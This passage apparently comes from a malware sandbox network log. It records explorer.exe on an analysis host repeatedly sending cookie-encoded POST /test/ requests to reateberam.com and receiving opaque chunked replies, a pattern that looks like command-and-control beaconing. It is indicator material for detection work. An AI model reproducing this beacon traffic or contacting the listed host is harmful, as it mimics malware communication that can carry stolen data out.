                                                                  Cookie: aXLYGobmm+hkYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:00 UTC | 793 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVTh6djcY6zsZEsQdKJgfDwsWbjQSFfGDwd7%2B8D5VWViPBXb7K6HI6yh05WuOENcFl17tMrVK16QDcEXlBqWpI2aOnxYjXiwI5IMroBXcfDBIF6%2BVv4gH95e%2FfIh3hw1Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22439b15a214-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13987&min_rtt=13971&rtt_var=5272&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=207062&cwnd=32&unsent_bytes=0&cid=4fe64cfc75a60d2b&ts=787&x=0"
                                                                  2024-12-02 17:46:00 UTC | 343 | IN |
                                                                  Data Ascii: 150PCqbTMq30IpuaxvegmLog39PPErRBCfCaP+2vCbLZ2mcphSGpB6yiJiVjA1mJkMqfZbk7F0gD7e6uKJGtZeoocA8705dGWNM7sGofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc04Bu3jIHMQb7XCe3Qlq4RG71rfCRApikg+N18IOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBfBWRp
                                                                  2024-12-02 17:46:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  26          192.168.2.5  50014        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:01 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:02 UTC  801                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:02 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IV2j5ABp0%2FWXjmscG6ZqU%2BW2XGZCTRY4ozL33rvft%2ByQnmUD8JFaDloNQGZ1SuGxqm1%2BdYSIO96XJSmEWY%2BoAvlJznZtBO2SSs0r83TvFGs7Um%2BLAmC%2F6SCLZZNAtT%2BBwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd225118af53fb-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=15393&min_rtt=14200&rtt_var=7711&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=122968&cwnd=32&unsent_bytes=0&cid=09caf0d190581e18&ts=697&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  27          192.168.2.5  50015        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:04 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:04 UTC  789                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=my4VKWZqIDHRv7sOI8a1OnBh3kH8ecaJoJpKZBekFlYAcQ3xHMOM%2FHm5lLbgNk0fmGu%2BZjKTnodtwIXA6K6A2oq4BDzOLs5vuSjoOuz46QUVsykMKkgcxVJygfXySgWpkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2261d80dab03-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14194&min_rtt=14190&rtt_var=5330&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=205243&cwnd=32&unsent_bytes=0&cid=d5bc2c68ed21cfe4&ts=703&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  28          192.168.2.5  50016        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:06 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:07 UTC  793                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:07 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f5LmrqrYTK6bIGA9o0QYyy6T08O31z3JYJ%2BccO8idmwqA4mupz%2BEddJQC1SUa4fiU%2BpxK%2Bxm08i5vfSqSC9kiGGXKKqA37k21zT6sNxC7jH9BTOwUX5xb7l090EForg5fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd226fac87a216-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=16260&min_rtt=14019&rtt_var=6858&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=208288&cwnd=32&unsent_bytes=0&cid=c1a438e821262c35&ts=810&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  29          192.168.2.5  50017        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:08 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:09 UTC  790                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:09 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LK3nItjYEIFNH9xjAXdoiSRR%2BddkR4Nrs2%2FyQNkbwWoEqeeN7y4upSsKqCBIawXtr2HPWqL5%2FZkBT4jaRr5QL11z9aSDAibmweWEbeUEulSuieqtkn5MA9aEPPpi9RN8YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd227d08f618fa-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1627&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1725768&cwnd=128&unsent_bytes=0&cid=f910c219f97c1cfe&ts=766&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  30          192.168.2.5  50018        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:10 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:11 UTC  790                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:11 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oQxTHnI3RPbdysIKgmerYxZVYwKEHymKmF2KZVBHmjp31vpLKg237fou1ldQyakqcu4wCT%2B5eSLAnEsXmBvss6%2BGKZIsrNtQqpPthOb5tBm90oq3kr%2BnVaJXjlkfYrAKw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2289bb35236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1892&min_rtt=1879&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1554018&cwnd=172&unsent_bytes=0&cid=6ff7e37b1905ff25&ts=756&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  31          192.168.2.5  50019        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:12 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:13 UTC  789                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:13 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8WSlgi3X7Jaf6FEPyIUYaASL7O1jCFVXrcMV5CbMOkgp%2BIjOmZHW%2B1LicBbKJ5tOAJvBYXQVew7fW3g8QTGyHbkB71GU02LmihuvNthWX6xFUh9fDIKUrCEld9t5CYJzTA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22976a5da250-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13709&min_rtt=13702&rtt_var=5153&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=212147&cwnd=32&unsent_bytes=0&cid=0a9aca3a71fe5733&ts=700&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  32          192.168.2.5  50020        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:14 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:15 UTC  797                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:15 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJFGBEDtZbhz4j3Q75B9F7rO3YH%2BLMpWsQqYRvFbNB1Enfykt2eYHQ3YM%2BtUtHFo0hO0UubVnm7HGhWaXQH%2B2K1VYjyYHAUdOcJ4H7%2FgpKBLsYmrWROD00J3L%2BOCZLHM%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22a4e8f6ab03-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13768&min_rtt=13763&rtt_var=5172&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=211502&cwnd=32&unsent_bytes=0&cid=bcfbaf0065231d20&ts=706&x=0"


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  33          192.168.2.5  50021        172.67.217.190  443               1028  C:\Windows\explorer.exe
                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                  2024-12-02 17:46:16 UTC  415                OUT        POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:17 UTC  789                IN         HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:17 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8lDhclwc3PqXjOaTt4FhZ96oxVdPwUuzNbPV3aTMbLDpqyt09uWMmAeSYovX%2F06ZSbtbcwCJ0w%2FiFiwbIdV7hrBULlMT8OsFfufIfXtnzIIAXt2%2FMh9jbpIPDhmw3SPJkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22b1df438c60-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1780&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1531200&cwnd=47&unsent_bytes=0&cid=5ebac1c8ffb2b61f&ts=763&x=0"
                                                                  2024-12-02 17:46:17 UTC | 339 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  34 | 192.168.2.5 | 50022 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:19 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:19 UTC | 795 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iD7aO61uESAqzkm9u9cLeUQkWWIcsy0khixu7wMxl1eZjjf5HhuPZ5e5CZ9v49%2FlrWOQcxWsmVV9%2B8%2B6r1dxvYa%2BxADEB%2BrZpJZT6zQ1VGhVPDSWBpSkzlvOLWATbDeRsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22bf4a8cebb6-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14134&min_rtt=14124&rtt_var=5318&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=205474&cwnd=32&unsent_bytes=0&cid=b00c6c01c424fe9e&ts=877&x=0"
                                                                  2024-12-02 17:46:19 UTC | 343 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  35 | 192.168.2.5 | 50023 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:21 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:22 UTC | 791 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:21 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeeOglsEMaLi0Bpx2fobbI%2FDZo0oKfG0ajpmTae%2B3Vb9h5MJNZxdcEWinnDOBbf1OCsRZd78u4YRz6uCz%2B1CnYLoPBwibkrSG75k1WJjkzYpynsdqKNWGTyJ1xdrzixPeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22cd1f78aab3-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14355&min_rtt=14338&rtt_var=5411&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=201685&cwnd=32&unsent_bytes=0&cid=69d6bfc79004baac&ts=718&x=0"
                                                                  2024-12-02 17:46:22 UTC | 339 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  36 | 192.168.2.5 | 50024 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:23 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:24 UTC | 796 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOc14We%2FuhrDNo8wjgiFwpHw6VTbSTa6c5f9Gnj86H10PcMygnatWHbE5SdkmhZpNAp74Mvv%2BXFuIvytLpnj%2FlSAHI43NBXYR8rRA%2BWhD%2BRnIhxkGxcZhjEm%2BuC8zqd9xA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22da2e3e0f6d-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1652&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1726788&cwnd=252&unsent_bytes=0&cid=c33c1e272bf8eff0&ts=756&x=0"
                                                                  2024-12-02 17:46:24 UTC | 343 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  37 | 192.168.2.5 | 50025 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:46:25 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hlYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:46:26 UTC | 786 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:46:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3kmSx2RhrFpcEECeZhHYvpRtZBsaPDxSZ52iHJSj6tC4DRV0hiE6lrqerC1OujfcF7NEfP4p7e1FpH5hST2YivffuF%2BfbBcC1Qy1PkvXvCVQ5v2Gphpdr7ffnSCGBdR0YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22e9fc924364-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2257&min_rtt=2255&rtt_var=850&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1283516&cwnd=206&unsent_bytes=0&cid=c9938b283baf6d28&ts=773&x=0"
                                                                  2024-12-02 17:46:26 UTC | 343 | IN | Data: chunked response body (opaque encoded text)
                                                                  2024-12-02 17:46:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  38 | 192.168.2.5 | 50026 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
